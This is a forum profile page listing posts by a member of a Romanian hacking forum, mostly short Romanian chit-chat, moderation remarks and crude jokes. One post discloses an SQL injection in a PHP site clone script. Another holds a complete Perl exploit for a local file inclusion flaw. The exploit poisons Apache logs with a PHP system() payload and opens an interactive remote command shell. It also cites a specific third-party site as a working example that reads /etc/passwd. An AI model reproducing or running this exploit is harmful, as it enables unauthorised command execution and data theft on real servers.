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Everything posted by kw3rln

  1. kw3rln

    Hackerul de Romania

    cineva so simtit dupa postarea lui nemessis
  2. io mas pune in locu tau la furat de rate sau gaini de la oameni din curte..macar are un rost .. manci bine ... poate si futi o gaina.. da vezi sa nu faci numa pene prin casa
  3. http://download.raffionline.de/downloads/security%20apps/xplizer.exe
  4. mai mult le public alea slabe si pt reclama la RST nimik altceva .. http://milw0rm.com/author/678
  5. e destul de greu .. sunt o gramada de combinatii .. oricum frumos tutorial
  6. mie nu mi-a mers .. da oricum nu fol yahoo messenger
  7. Katmai Postare reclama.. i-am sters linku si am pus linkul pe youtube + trimis mesaj privat sa nul mai puna ... l-a mai pus. . treaba repetata de 3 ori 2 Avertismente
  8. ceva pe verde clar .. ceva site "racoros" .. ceva site cand intri pe el sa-ti vina sa mergi la magazin sa-ti iei o bere tuborg [preferata mea] .. oricum o sa fie designeri buni ..
  9. avem nevoie de un moderator pt bug_reports pana fac scriptul automat .. trebuie sa aprobe buguri .. si sa calculeze punctele munca grea.. pt 1 sapt .. maxim 2 ..
  10. daca castiga careva facem o intalnire RST undeva .. si merge la bere.. ar fi c00l
  11. so oferit sa plateasca bani pt hosting
  12. kw3rln

    Problema Z.1

    ****** sau care era? old old zbeng
  13. data trecuta cand ai fost acuzat ai pus ca nebunu codu sursa online Amu sa speram ca nu faci asa ceva ...
  14. pt tine iti fac buton AutoBan
  15. Slick pot sai dau ban iara ca atata pot sa urasc pruncii astia mici de critica fara sa aiba habar ce zic ... is putin ametit deci dau ban mai usor si mai cu multa satisfactie
  16. mie mi se pare ff diferit a lu darkbyte de-al nostru .. pe langa ca RSTn are mai multe optiuni ..
  17. fa topic unde pui toate problemele. . nu fa un topic pt fiecare pb .. pe langa cas de kkt
  18. FreeDomain.co.nr Clone SQL Injection Auth0r: Kw3rln from Romanian Security Team Link: hTTp://RSTZONE.NET On members.php we have: #14: $logindomain = $_POST["logindomain"]; #41: $login=login_user($logindomain,$loginpass); in includes/functions we have: function login_user($user_name, $pass_word) { global $redir_table; // form our sql query $result = mysql_query("SELECT * FROM $redir_table WHERE host ='$user_name'") or die (mysql_error()); Exploit s00n greetz to all RST memberz
  19. exemplu: http://www.pck1.go.th/mongdamclub/xdrive/popup.php?read=../../../../../../../../../../etc/passwd #!/usr/bin/perl # # Xdrive.com Clone Local File Inclusion Exploit # LinK : [url]http://rapidshare.com/files/33251938/clonesite.rar[/url] # # (c)od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A [url]http://RSTZONE.NET[/url] # Contact: teh_lost_byte[AT]YaHOo[dot]com # # # File inclusion: http://www.site.com/xdrive/popup.php?read=<local/remote file> # # Example: #[url]http://www.pck1.go.th/mongdamclub/xdrive/popup.php?read=../../../../../../../../../../etc/passwd[/url] # # Greetz to all RST memberz and milw0rm use IO::Socket; use LWP::Simple; @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); print "[RST] Xdrive.com Clone Local File Inclusion Exploit\n"; print "[RST] need magic_quotes_gpc = off\n"; print "[RST] c0ded by Kw3rLN from Romanian Security Team [ [url]http://rst-crew.net[/url] ] \n\n"; if (@ARGV < 3) { print "[RST] Usage: xdrive.pl [host] [path] [apache_path]\n\n"; print "[RST] Apache Path: \n"; $i = 0; while($apache[$i]) { print "[$i] $apache[$i]\n";$i++;} exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print "[RST] Injecting some code in log files...\n"; $CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path.$CODE." HTTP/1.1\r\n"; print $socket "User-Agent: ".$CODE."\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Connection: close\r\n\r\n"; close($socket); print "[RST] Shell!! write q to exit !\n"; print "[RST] IF not working try another apache path\n\n"; print "[shell] ";$cmd = <STDIN>; while($cmd !~ "q") { $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n"; print $socket "GET ".$path."/popup.php?read=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$host."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($raspuns = <$socket>) { print $raspuns; } print "[shell] "; $cmd = <STDIN>; }
  20. Yves larock - rise up vandalism remix.mp3
  21. kw3rln

    Problema 2

    ma simt ca la gradinitza
  22. kw3rln

    Problema 2

    la primul plus adaugi o linie mica si devine 545+5 = 550
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